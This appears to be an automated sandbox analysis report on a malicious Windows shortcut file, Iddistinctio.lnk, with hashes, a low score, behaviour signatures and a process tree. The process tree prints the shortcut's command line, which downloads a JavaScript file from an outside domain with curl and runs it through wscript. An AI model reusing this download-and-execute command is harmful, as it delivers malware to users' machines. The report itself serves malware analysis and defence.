Resubmissions

14-09-2022 15:43

220914-s535ysedgr 7

14-09-2022 11:44

220914-nwcjesdhdq 7

Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    14-09-2022 11:44

General

  • Target

    Iddistinctio.lnk

  • Size

    2KB

  • MD5

    c6429a11887977701ae6c4e7b1faab05

  • SHA1

    c2779ef3e823702979df08486fd4bb6c1b7212f9

  • SHA256

    2f38328d6a94d2832d9c7f2a15147aef41f615557dc2787599906b7cbd3bb338

  • SHA512

    e025d1e842f77d9275b89acd327ca26f8a8fce340db7eb3cf7d6aa6aeb356cf99276d8b049e38d70d2b754adf377b0d94d4da6365c46bc141035a9d183cb1ef6

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Iddistinctio.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /C echo 'Oj6b' && MD "C:\ProgramData\A_Np\fcA" && echo "zLH" && curl.exe --output C:\ProgramData\A_Np\fcA\MJ.aRq.GCk.js https://ap2web.com/MwS/13.html && cd "C:\ProgramData\A_Np\fcA" && wscript MJ.aRq.GCk.js
      2⤵
      PID:1288

Network

MITRE ATT&CK Enterprise v6


Downloads

  • memory/1288-88-0x0000000000000000-mapping.dmp
  • memory/1648-54-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
    Filesize: 8KB